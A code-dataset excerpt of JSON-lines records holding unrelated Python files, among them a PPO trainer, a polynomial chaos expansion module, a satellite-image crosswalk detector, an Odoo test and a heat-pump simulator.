df_rawdata.columns.tolist()\ndf_rawdata_col_name.insert(len(df_rawdata_col_name) - 1,\n df_rawdata_col_name.pop(df_rawdata_col_name.index(cust_id)))\ndf_rawdata = df_rawdata[df_rawdata_col_name]\ndf_rawdata.head(100).to_csv('{}{}_{}_xgb_rawdata.csv'.format(\n output_dir, project_name, feature_type), index=False)\n\ndf_output_statis.to_csv('{}{}_{}_xgb_output_statis.csv'.format(\n output_dir, project_name, feature_type))\n\nos.makedirs(project_dir + 'data/statis/auc_ks', exist_ok=True)\ndf_output_statis.to_csv('{}data/statis/auc_ks/{}.csv'.format(\n project_dir, feature_type))\n\nlog.info('模型相关结果持久化完成')\n# ===========================模型持久化=================================\n\n\n# In[ ]:\n\n\n# In[ ]:\n","repo_name":"ZhengRyan/data_to_treemodel","sub_path":"model_fit_nobin_top30_lhp_amount_rule.py","file_name":"model_fit_nobin_top30_lhp_amount_rule.py","file_ext":"py","file_size_in_byte":20903,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"11098695142","text":"import pandas as pd\nimport networkx as nx\nimport json\n\nwith open(snakemake.input[0]) as f:\n df = json.load(f)\n\n\nall_links = list(df['links'].keys())\nrecords = []\nfor link in all_links:\n spl = link.split(\";\")\n record = {\n \"Source\": spl[0],\n \"Target\": spl[1],\n }\n records.append(record)\n\n\nlinks_df = pd.DataFrame(records)\nlinks_df.to_csv(snakemake.output[0])\n","repo_name":"murrayds/fakenews_pl","sub_path":"workflow/scripts/convert_links_to_edgelist.py","file_name":"convert_links_to_edgelist.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39399413118","text":"\"\"\"Module that contains the functions that simulate\nthe actual transitions in temperature desired by the simulator\n\n!NOT FUNCTIONAL!\"\"\"\n\n###IMPORT SECTION###\nimport math as m\nimport time\nimport simFormulas as f\nimport csv as c\n\nfrom datetime import datetime as t\nfrom datetime import timedelta\nfrom datadump import DesiredTemps, SpecificHeat, SpecificMass\n\n###VARIABLE SECTION###\n\n###FUNCTION SECTION###\ndef realism_transitioning(currTemp, surface, roomCapacity, floorCapacity, speedup):\n with open(\"..\\\\WPS\\\\simData.csv\", \"w\") as file:\n wrt = c.writer(file, dialect=\"excel\", delimiter=\";\")\n \n ticker = 0\n timestart = t(2018, 10, 1, 0, 0, 0, 0)\n\n currRoomTemp = currTemp\n currFloorTemp = currTemp\n \n start = t.now()\n \n while currRoomTemp <= DesiredTemps[\"Desired Temp Room\"]:\n \n currFloorDeltaT = f.CurrentDeltaT(f.FloorWarmingPower(surface),f.TrueSubstanceMass(floorCapacity, SpecificMass[\"Gewapend Beton\"]),SpecificHeat[\"Beton\"])\n currFloorTemp += currFloorDeltaT \n \n currRoomDeltaT = f.CurrentDeltaT(f.HeatTransfer(f.TransferCoefficient(0.25),surface,f.CurrentDeltaT(f.WarmthRequired(f.TrueSubstanceMass(floorCapacity, SpecificMass[\"Gewapend Beton\"]),SpecificHeat[\"Beton\"],currFloorDeltaT),SpecificMass[\"Lucht\"],SpecificHeat[\"Lucht\"])),f.TrueSubstanceMass(roomCapacity,SpecificMass[\"Lucht\"]),SpecificHeat[\"Lucht\"])\n if currFloorTemp > currRoomTemp:\n currRoomTemp += currRoomDeltaT\n currtime = (t.now() - start)\n currtime = currtime.total_seconds() / 3600\n outsideTemp = f.TemperatureModel(currtime) * 0.0005\n if outsideTemp < 0:\n currRoomTemp -= -outsideTemp\n else: \n currRoomTemp -= outsideTemp\n \n time.sleep(1 / speedup)\n\n if(ticker % 60 == 0):\n timestart += timedelta(seconds=60)\n row = [currFloorTemp,currRoomTemp,timestart]\n 
wrt.writerow(row)\n\n ticker+=1\n\n print(\"done\")\n\n file.close()\n \ndef datetime_to_float(d):\n \"\"\"convert datetime to time in hours\"\"\"\n epoch = t.utcfromtimestamp(0)\n total_seconds = (d - epoch).total_seconds()\n # total_seconds will be in decimals (millisecond precision)\n return total_seconds / 3600\n\n\n###basic bitch oplossing\n##tijdsfunctie zodat het lijkt alsof de kamer echt warm wordt > simulatie\n##van deltaT delen door benodigde tijd = temperatuur increment\n##startTemp + increment totdat desiredTemp is bereikt\n###advanced coolguy oplossing\n##deltaT verkleinen en de berekeningen iedere keer opnieuw uitvoeren,\n##zodat het verwarmen van de vloer invloed heeft op het verwarmen\n##van de kamer vanaf het begin van de simulatie.\n###ultieme baas oplossing\n##pak de advanced coolguy oplossing en laat hierop alle\n##verliezen en winsten uit de omgeving op los voor ultrarealism simulatie\n###EINDE ENZO","repo_name":"RK21898/WPS","sub_path":"____GARBAGE/INCINERATRON3000/heatpumpFunc.py","file_name":"heatpumpFunc.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27377108966","text":"import math\n# from pce_predict import PcePredict\nfrom regression import regression\nfrom typing import List\n\n\ndef getPCEdegree(input):\n M = len(input)\n maxDegree = 10\n p = 1\n for p in range(1, maxDegree):\n if len(list(zip(*input))) < 3 * math.comb(M + p, p):\n if p - 1 == 0:\n return 1\n else:\n return p - 1\n return maxDegree\n\n\nclass iOrthogonalPolynomial:\n def __init__(\n self,\n name: str,\n bounds: List[float],\n degree: int,\n Aterms: List[float],\n Bterms: List[float],\n ):\n self.name = name\n self.bounds = bounds\n self.degree = degree\n self.Aterms = Aterms\n self.Bterms = Bterms\n\n\nclass Pce:\n def __init__(self, input_data, output, u_matrix, pdf, pce_degree):\n self.pce = [OutputPce(input_data, output, u_matrix, pdf, pce_degree)]\n # self.predictPce = [PcePredict(self.pce) for _ in output]\n\n\nclass OutputPce:\n def __init__(self, input_data, output, u_matrix, pdf, pce_degree):\n self.input = input_data\n self.output = output\n self.u_matrix = u_matrix\n self.input_PDF = pdf\n self.degree = getPCEdegree(input_data)\n self.uniPoly = self.get_multivariate_orthogonalPoly(pdf, pce_degree)\n self.alphaIdx = self.generateMultiIndex(\n self.degree, len(self.input_PDF))\n self.uniP_val = self.evaluated_multivariate_orthoPoly(\n self.uniPoly, self.u_matrix\n )\n self.Psi_alpha = self.compute_Psi_alpha_matrix(\n self.alphaIdx, self.uniP_val)\n self.coeffs = regression(self.output, self.Psi_alpha)\n self.cardAlpha = len(self.alphaIdx)\n\n def evaluated_multivariate_orthoPoly(\n self, multiPoly: List[iOrthogonalPolynomial], u_matrix: List[List[float]]\n ) -> List[List[List[float]]]:\n multiVariate_matrix = [] # M x Ns x P\n for i in range(len(u_matrix)):\n multiVariate_matrix.append(\n self.evaluate_univariate_orthoPoly(multiPoly[i], u_matrix[i])\n )\n\n return multiVariate_matrix\n\n def evaluate_univariate_orthoPoly(self, multiPoly, u_vector):\n univariate_matrix = [\n [\"\" for _ in range(multiPoly[\"degree\"] + 1)] for _ in range(len(u_vector))\n ]\n # univariate_matrix = [[], []] # Ns x P\n for ns in range(len(u_vector)):\n univariate_matrix[ns] = self.evaluate_orthoPoly_dataPoint(\n multiPoly[\"Aterms\"],\n multiPoly[\"Bterms\"],\n multiPoly[\"degree\"],\n u_vector[ns],\n )\n\n return univariate_matrix\n\n def evaluate_orthoPoly_dataPoint(self, Aterms, Bterms, degree, 
u_dataPt):\n orthoPoly_pointEvaluation = []\n orthoPoly_pointEvaluation.append(0)\n orthoPoly_pointEvaluation.append(Bterms[0])\n\n for d in range(degree):\n orthoPoly_pointEvaluation.append(\n (u_dataPt - Aterms[d])\n * (orthoPoly_pointEvaluation[d + 1] / Bterms[d + 1])\n - (orthoPoly_pointEvaluation[d] * Bterms[d]) / Bterms[d + 1]\n )\n\n return orthoPoly_pointEvaluation[1:]\n\n def compute_Psi_alpha_matrix(self, alpha, Mo):\n Ns = len(Mo[0])\n M = len(Mo)\n cardA = len(alpha)\n Psi_alpha = []\n\n for ns in range(Ns):\n Psi_alpha.append([1] * cardA)\n for cA in range(cardA):\n for m in range(M):\n deg = alpha[cA][m]\n if deg != 0:\n Psi_alpha[ns][cA] *= Mo[m][ns][deg]\n\n return Psi_alpha\n\n def generateMultiIndex(self, degree, M):\n result = []\n\n def generateHelper(curr, totalSum, remaining):\n if remaining == 0:\n result.append(curr)\n return\n\n for i in range(totalSum, -1, -1):\n next_ = curr + [i]\n generateHelper(next_, totalSum - i, remaining - 1)\n\n generateHelper([], degree, M)\n return result[::-1]\n\n def get_multivariate_orthogonalPoly(self, inputPDF, degree):\n univPoly = []\n\n for i in range(len(inputPDF)):\n if inputPDF[i].name == \"uniform\":\n univPoly.append(self.univariate_legendrePoly(degree))\n elif inputPDF[i].name == \"normal\":\n univPoly.append(self.univariate_hermitePoly(degree))\n else:\n raise ValueError(\n \"Orthogonal polynomials construction: solution not yet implemented.\"\n )\n\n return univPoly\n\n def univariate_legendrePoly(self, degree):\n a_terms = []\n b_terms = []\n\n for i in range(degree + 1):\n a_terms.append(0)\n if i == 0:\n b_terms.append(1)\n else:\n b_terms.append((1 / (4 - i ** (-2))) ** 0.5)\n\n # b_terms[0] = 1\n\n legendre_poly = {\n \"name\": \"legendre\",\n \"bounds\": [-1, 1],\n \"degree\": degree,\n \"Aterms\": a_terms,\n \"Bterms\": b_terms,\n }\n\n return legendre_poly\n\n def univariate_hermitePoly(self, degree):\n a_terms = []\n b_terms = []\n\n for i in range(degree + 1):\n a_terms.append(0)\n b_terms.append(i**0.5)\n\n b_terms[0] = 1\n\n hermite_poly = {\n \"name\": \"hermite\",\n \"bounds\": [-float(\"inf\"), float(\"inf\")],\n \"degree\": degree,\n \"Aterms\": a_terms,\n \"Bterms\": b_terms,\n }\n\n return hermite_poly\n","repo_name":"apepe91/SEGA2023","sub_path":"sensitivityAnalysis/pce.py","file_name":"pce.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"74440324153","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" Proximal Policy Optimization implementation. 
\"\"\"\nfrom typing import Tuple, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom bees.rl.model import Policy\nfrom bees.rl.storage import RolloutStorage\nfrom bees.rl.algo.algo import Algo\n\n# pylint: disable=duplicate-code, too-many-arguments, too-few-public-methods\n\n\nclass PPO(Algo):\n \"\"\"\n Proximal Policy Optimization (clipped) implementation.\n\n Parameters\n ----------\n actor_critic : ``Policy``.\n The model object from ``bees.rl.model.py``.\n clip_param : ``float``.\n \"\"\"\n\n def __init__(\n self,\n actor_critic: Policy,\n clip_param: float,\n ppo_epoch: int,\n num_mini_batch: int,\n value_loss_coef: float,\n entropy_coef: float,\n lr: Optional[float] = None,\n eps: Optional[float] = None,\n max_grad_norm: Optional[float] = None,\n use_clipped_value_loss: bool = True,\n ):\n\n super(PPO, self).__init__()\n self.actor_critic = actor_critic\n\n self.clip_param = clip_param\n self.ppo_epoch = ppo_epoch\n self.num_mini_batch = num_mini_batch\n\n self.value_loss_coef = value_loss_coef\n self.entropy_coef = entropy_coef\n\n self.max_grad_norm = max_grad_norm\n self.use_clipped_value_loss = use_clipped_value_loss\n\n self.optimizer = optim.Adam(actor_critic.parameters(), lr=lr, eps=eps)\n\n def update(self, rollouts: RolloutStorage) -> Tuple[float, float, float]:\n advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]\n advantages = (advantages - advantages.mean()) / (advantages.std() + 1e-5)\n\n value_loss_epoch = 0.0\n action_loss_epoch = 0.0\n dist_entropy_epoch = 0.0\n\n for _ in range(self.ppo_epoch):\n if self.actor_critic.is_recurrent:\n data_generator = rollouts.recurrent_generator(\n advantages, self.num_mini_batch\n )\n else:\n data_generator = rollouts.feed_forward_generator(\n advantages, self.num_mini_batch\n )\n\n for sample in data_generator:\n (\n obs_batch,\n recurrent_hidden_states_batch,\n actions_batch,\n value_preds_batch,\n return_batch,\n masks_batch,\n old_action_log_probs_batch,\n adv_targ,\n ) = sample\n\n # Reshape to do in a single forward pass for all steps\n (\n values,\n action_log_probs,\n dist_entropy,\n _,\n ) = self.actor_critic.evaluate_actions(\n obs_batch, recurrent_hidden_states_batch, masks_batch, actions_batch\n )\n\n ratio = torch.exp(action_log_probs - old_action_log_probs_batch)\n surr1 = ratio * adv_targ\n surr2 = (\n torch.clamp(ratio, 1.0 - self.clip_param, 1.0 + self.clip_param)\n * adv_targ\n )\n action_loss = -torch.min(surr1, surr2).mean()\n\n if self.use_clipped_value_loss:\n value_pred_clipped = value_preds_batch + (\n values - value_preds_batch\n ).clamp(-self.clip_param, self.clip_param)\n value_losses = (values - return_batch).pow(2)\n value_losses_clipped = (value_pred_clipped - return_batch).pow(2)\n value_loss = (\n 0.5 * torch.max(value_losses, value_losses_clipped).mean()\n )\n else:\n value_loss = 0.5 * (return_batch - values).pow(2).mean()\n\n self.optimizer.zero_grad()\n (\n value_loss * self.value_loss_coef\n + action_loss\n - dist_entropy * self.entropy_coef\n ).backward()\n nn.utils.clip_grad_norm_(\n self.actor_critic.parameters(), self.max_grad_norm\n )\n self.optimizer.step()\n\n value_loss_epoch += value_loss.item()\n action_loss_epoch += action_loss.item()\n dist_entropy_epoch += dist_entropy.item()\n\n num_updates = self.ppo_epoch * self.num_mini_batch\n\n value_loss_epoch /= num_updates\n action_loss_epoch /= num_updates\n dist_entropy_epoch /= num_updates\n\n return value_loss_epoch, action_loss_epoch, 
dist_entropy_epoch\n","repo_name":"langfield/bees","sub_path":"bees/rl/algo/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"36078279883","text":"import requests\nfrom io import BytesIO\nimport numpy as np\nimport tensorflow as tf\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom object_detection.utils import ops as utils_ops\nimport os\nimport PIL\n\ndef load_image_into_numpy_array(image):\n\t# https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\ndef getURL(x, y):\n\treturn 'http://maps.google.com/maps/api/staticmap?center=' + str(y) + ',' + str(x) + '&zoom=19&size=500x500&scale=2&maptype=satellite&key=?????????'\n\ndef saveSquare(x,y):\n\t\t\tresponse =requests.get(getURL(x,y))\n\t\t\timg = Image.open(BytesIO(response.content))\n\t\t\timg = img.resize((1000,1000), PIL.Image.ANTIALIAS)\n\t\t\timgName = 'api_query.png'\n\t\t\tif os.path.isfile(imgName):\n\t\t\t\tos.remove(imgName)\n\t\t\timg.save(imgName)\n\t\t\treturn(imgName)\n\n\ndef loadModel(path_to_graph):\n\t# https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\n\tdetection_graph = tf.Graph()\n\twith detection_graph.as_default():\n\t\tod_graph_def = tf.GraphDef()\n\t\twith tf.gfile.GFile(path_to_graph, 'rb') as fid:\n\t\t\tserialized_graph = fid.read()\n\t\t\tod_graph_def.ParseFromString(serialized_graph)\n\t\t\ttf.import_graph_def(od_graph_def, name='')\n\treturn(detection_graph)\n\n#path_to_graph = \"Starthack/inference_graph/frozen_inference_graph.pb\"\n#detection_graph = loadModel()\n\ndef run_inference_for_single_image(image, graph):\n\t#https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\n with graph.as_default():\n with tf.Session() as sess:\n # Get handles to input and output tensors\n ops = tf.get_default_graph().get_operations()\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes', 'detection_masks'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n if 'detection_masks' in tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])\n detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n detection_masks, detection_boxes, image.shape[0], image.shape[1])\n detection_masks_reframed = tf.cast(\n tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n # Follow the convention by adding back the batch dimension\n tensor_dict['detection_masks'] = 
tf.expand_dims(\n detection_masks_reframed, 0)\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n return output_dict\n\n\ndef box_extractor(boxes, scores, img_width, img_height):\n\t# ymin,xmin,ymax, xmax\n\tboxes_relevant = []\n\tbox_centers = []\n\tfor box, score in zip(boxes, scores):\n\t\tif score > 0.5:\n\t\t\tboxes_relevant.append(box)\n\t\t\tx_mean = (box[1] + box[3])/2\n\t\t\ty_mean = (box[0] + box[2])/2\n\t\t\tbox_centers.append([x_mean * img_width, y_mean * img_height])\n\treturn(box_centers)\n\n\ndef cwClassification(x,y, inference_graph):\n\timgName = saveSquare(x,y)\n\tIMAGE_SIZE = (8, 8)\n\tPATH_TO_LABELS = \"../configs_labels/label_map.pbtxt\"\n\tNUM_CLASSES = 1\n\n\tlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\n\tcategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\n\tcategory_index = label_map_util.create_category_index(categories)\n\n\timage = Image.open(imgName)\n\twidth = image.width\n\theight = image.height\n\tcenter_img = [width/2, height/2]\n\timage = image.convert('RGB')\n\t#image.save('test.jpg')\n\timg_np = load_image_into_numpy_array(image)\n\toutput_dict = run_inference_for_single_image(img_np, inference_graph)\n\n\tvis_util.visualize_boxes_and_labels_on_image_array(\n\t\timg_np,\n\t\toutput_dict['detection_boxes'],\n\t\toutput_dict['detection_classes'],\n\t\toutput_dict['detection_scores'],\n\t\tcategory_index,\n\t\tinstance_masks=output_dict.get('detection_masks'),\n\t\tuse_normalized_coordinates=True,\n\t\tline_thickness=6)\n\tplt.figure(figsize=IMAGE_SIZE)\n\tplt.imshow(img_np)\n\toutFile = 'classification.png'\n\tif os.path.isfile(outFile):\n\t\tos.remove(outFile)\n\tplt.savefig(outFile)\n\n\tcenters = box_extractor(output_dict['detection_boxes'], output_dict['detection_scores'], width, height)\n\tdef getClosestCW(points):\n\t\tdist_min = 100000000\n\t\tfor point in points:\n\t\t\tdist = ((point[0] - center_img[0])**2 + (point[1] - center_img[1])**2)**0.5\n\t\t\tif(dist_min > dist):\n\t\t\t\tdist_min = dist\n\t\t\t\tpoint_min = point\n\t\treturn(point_min)\n\tclosestCW = getClosestCW(centers)\n\n\tgeo_codConsy = 0.000005614 * 0.175\n\tgeo_codConsx = 0.000005614 * 0.2325\n\tx_dist = (closestCW[0] - center_img[0]) * geo_codConsx\n\ty_dist = -(closestCW[1] - center_img[1]) * geo_codConsy\n\n\tcw_geoCodx = x + x_dist\n\tcw_geoCody = y + y_dist\n\treturn(cw_geoCody.item(), cw_geoCodx.item())\n\n\n\n#x = 7.4296\n#y= 46.9432\n\n#xy = cwClassification(x,y, detection_graph)\n\n\n","repo_name":"joelgschwind/Starthack","sub_path":"API/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"23577806845","text":"from django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('chat', 
'0005_auto_20161128_0759'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='chat',\n name='timestamp',\n field=models.DateTimeField(auto_now_add=True),\n ),\n ]\n","repo_name":"cjlee112/socraticqs2","sub_path":"mysite/chat/migrations/0006_auto_20170117_0513.py","file_name":"0006_auto_20170117_0513.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} +{"seq_id":"23731034625","text":"import numpy as np\nimport sys\nfrom typing import List\n\n\ndef dna_oligomers(num_bp: int,omit_equiv=True) -> List[str]:\n uo = UniqueOligomers(omit_equiv=omit_equiv)\n return uo.get_oligomers(num_bp)\n\nclass UniqueOligomers:\n def __init__(self, omit_equiv: bool=True):\n self.bases = 'atcg'\n self.omit_equiv = omit_equiv\n\n def get_oligomers(self, num_bp):\n self.seqlist = []\n self._seqloop('', 0, num_bp)\n return self.seqlist\n\n def _seqloop(self, seq: str, current: int, num_bp: int):\n current += 1\n for i in range(len(self.bases)):\n new_seq = seq + self.bases[i]\n if current < num_bp:\n self._seqloop(new_seq, current, num_bp)\n else:\n if not (self.omit_equiv and self.invert_seq(new_seq) in self.seqlist):\n self.seqlist.append(new_seq)\n\n def invert_seq(self, seq: str):\n comp_dict = {'a': 't', 't': 'a', 'c': 'g', 'g': 'c'}\n return ''.join(comp_dict[base] for base in seq[::-1])\n\n def get_mid_dimer(self, seq: str):\n if len(seq) % 2 == 0:\n unique_dimers = sorted(self.get_oligomers(2))\n dimer = seq[len(seq)//2-1:len(seq)//2+1]\n if dimer not in unique_dimers:\n dimer = self.invert_seq(dimer)\n seq = self.invert_seq(seq)\n return dimer, seq\n return '', seq\n \ndef complementary_sequence(sequence: str):\n comp_dict = {'a': 't', 't': 'a', 'c': 'g', 'g': 'c'}\n return ''.join(comp_dict[base] for base in sequence.lower()[::-1])\n\n\nif __name__ == \"__main__\":\n \n if len(sys.argv) < 2:\n print(\"usage: %s N\"%sys.argv[0])\n sys.exit()\n \n N = int(sys.argv[1])\n bases = \"atcg\"\n if len(sys.argv) >= 3:\n bases = sys.argv[2]\n \n uo = UniqueOligomers(bases=bases)\n olis = uo.get_oligomers(N)\n \n print(len(olis))\n #~ for oli in olis:\n #~ print(oli)\n \n \n \n","repo_name":"eskoruppa/IOPolyMC","sub_path":"iopolymc/unique_oligomers.py","file_name":"unique_oligomers.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70849573114","text":"# -*- coding: utf-8 -*- \r\nimport clr\r\nclr.AddReference(\"System\")\r\nclr.AddReference(\"Feng.Base\");\r\nclr.AddReference(\"Feng.Windows.Application\");\r\nclr.AddReference(\"Zkzx.Model.Dao\")\r\nimport Feng;\r\nimport Zkzx.Model;\r\n\r\nclass 专家任务管理(object):\r\n @staticmethod\r\n def 撤销专家任务的车辆作业监控(masterForm):\r\n entity = masterForm.DisplayManager.CurrentItem;\r\n if (entity == None or entity.车辆作业 == None): \r\n Feng.MessageForm.ShowWarning(\"还未开始监控,不需撤销!\");\r\n return;\r\n\r\n #if (entity.车辆作业.结束时间 != None):\r\n # Feng.MessageForm.ShowWarning(\"专家任务的车辆作业监控已结束,无法撤销!\");\r\n # return;\r\n\r\n Zkzx.Model.车辆作业Dao().撤销监控(entity.车辆作业);\r\n Feng.MessageForm.ShowInfo(\"撤销成功。\");\r\n Feng.Grid.UnBoundGridExtention.ResetRowData(masterForm.MasterGrid, masterForm.MasterGrid.CurrentDataRow);\r\n\r\n @staticmethod\r\n def 撤销专家任务的车辆作业(masterForm):\r\n entity = masterForm.DisplayManager.CurrentItem;\r\n if (entity == None or entity.车辆作业 == None): \r\n Feng.MessageForm.ShowWarning(\"还未有作业,不需撤销!\");\r\n return;\r\n\r\n if (entity.车辆作业.开始时间 != None):\r\n 
Feng.MessageForm.ShowWarning(\"专家任务的车辆作业已开始监控,请先撤销监控!\");\r\n return;\r\n\r\n Zkzx.Model.车辆作业Dao().撤销车辆作业(entity.车辆作业);\r\n Feng.MessageForm.ShowInfo(\"撤销成功。\");\r\n Feng.Grid.UnBoundGridExtention.ResetRowData(masterForm.MasterGrid, masterForm.MasterGrid.CurrentDataRow);\r\n\r\n @staticmethod\r\n def 撤销专家任务下达(masterForm):\r\n entity = masterForm.DisplayManager.CurrentItem;\r\n if (entity == None or entity.下达时间 == None):\r\n Feng.MessageForm.ShowWarning(\"还未下达,不需撤销!\");\r\n return;\r\n\r\n if (entity.车辆作业 != None):\r\n Feng.MessageForm.ShowWarning(\"专家任务已安排车辆作业,请先撤销车辆作业!\");\r\n return;\r\n\r\n entity.下达时间 = None;\r\n Zkzx.Model.专家任务Dao().Update(entity);\r\n Feng.MessageForm.ShowInfo(\"撤销成功。\");\r\n Feng.Grid.UnBoundGridExtention.ResetRowData(masterForm.MasterGrid, masterForm.MasterGrid.CurrentDataRow);","repo_name":"zephyrrr/mERP-ZKZX","sub_path":"Zkzx.Script/专家任务管理.py","file_name":"专家任务管理.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"28919506540","text":"import math\n\nnumber = 600851475143\n\ndef maxPrime(n):\n upper_limit_factor = math.ceil(n**0.5)\n for i in range(2, upper_limit_factor):\n if n%i ==0:\n upper_limit_prime = math.ceil(i**0.5)\n for j in range(2,upper_limit_prime):\n if i%j ==0:\n break\n else:\n max_prime = i\n return max_prime\n\nprint(maxPrime(number))\n","repo_name":"Malith-19/Euler","sub_path":"Problem 3 - method 2.py","file_name":"Problem 3 - method 2.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33369586996","text":"from datetime import date\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestStockProductsValuationFinal(TransactionCase):\n\n def setUp(self):\n super().setUp()\n self.StockProductsValuationFinal = self.env[\"ple.stock.products.valuation.final\"]\n\n def test_compute_total_value(self):\n \"Check _compute_total_value method\"\n quantity_product_hand = 10.0\n standard_price = 20.0\n expected_total_value = quantity_product_hand * standard_price\n product_valuation_final = self.StockProductsValuationFinal.create({\n 'quantity_product_hand': quantity_product_hand,\n 'standard_price': standard_price,\n })\n self.assertEqual(product_valuation_final.total_value,\n expected_total_value)\n\n print(\"Test compute_total_value StockProductsValuationFinal OK ...... !!!!\")\n print(\"======================== Test StockProductsValuationFinal OK ========================\")\n\n\nclass TestPlePermanentFinal(TransactionCase):\n\n def setUp(self):\n super().setUp()\n self.PlePermanentFinal = self.env[\"ple.permanent.inventory.physical.units\"]\n\n def test_generete_ending_balances(self):\n \"Check generete_ending_balances method\"\n date_start = date(2023, 1, 1)\n date_end = date(2023, 12, 31)\n company_id = 1\n inventory = self.PlePermanentFinal.create({\n 'date_start': date_start,\n 'date_end': date_end,\n 'company_id': company_id,\n 'state': 'load',\n 'state_send': '1',\n\n })\n inventory.generete_ending_balances()\n\n print(\"Test generete_ending_balances PlePermanentFinal OK ...... 
!!!!\")\n\n def test_opening_balances(self):\n \"Check opening_balances method\"\n product = 1\n quantity_hand = {\n 'quantity_product_hand': 10.0,\n 'product_valuation': 'Product A',\n 'udm_product': 'uom',\n 'standard_price': 20.0,\n 'total_value': 200.0,\n 'code_exist': 1,\n }\n year = '2023'\n month = '01'\n day = '01'\n correct_name = 'Product A'\n inventory = self.PlePermanentFinal.create({\n 'state': 'draft',\n 'state_send': '1',\n 'date_start': '2021-01-01',\n 'date_end': '2021-01-31',\n })\n inventory.opening_balances(\n product, quantity_hand, year, month, day, correct_name=correct_name\n )\n\n print(\"Test opening_balances PlePermanentFinal OK ...... !!!!\")\n print('======================== Test PlePermanentFinal OK ========================')\n","repo_name":"metcom-dev/metcom","sub_path":"ple_permanent_inventory_in_physical_units/tests/test_ple_permanent_final.py","file_name":"test_ple_permanent_final.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41880542681","text":"from __future__ import absolute_import\n\nimport math\nimport numpy as np\n\nimport mindspore.ops as ops\nimport mindspore.nn as nn\nimport mindspore.common.dtype as mstype\nfrom mindspore import Tensor, Parameter\nfrom mindspore.ops.primitive import constexpr\n\nfrom .activation import get_activation\nfrom ..utils.check_func import check_param_type\n\n__all__ = ['LinearBlock', 'ResBlock', 'InputScale',\n 'FCSequential', 'MultiScaleFCSequential']\n\n\n@constexpr\ndef _check_dense_input_shape(x, prim_name=None):\n msg_prefix = f\"For '{prim_name}', the\" if prim_name else \"The\"\n if len(x) < 2:\n raise ValueError(\n f\"{msg_prefix} dimension of 'x' should not be less than 2, but got {len(x)}.\")\n\n\nclass LinearBlock(nn.Cell):\n r\"\"\"\n The LinearBlock. Applies a linear transformation to the incoming data.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as input `input` . For the values of str, refer to the function `mindspore.common.initializer`.\n Default: ``\"normal\"``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype is\n same as input `input` . The values of str refer to the function `mindspore.common.initializer`.\n 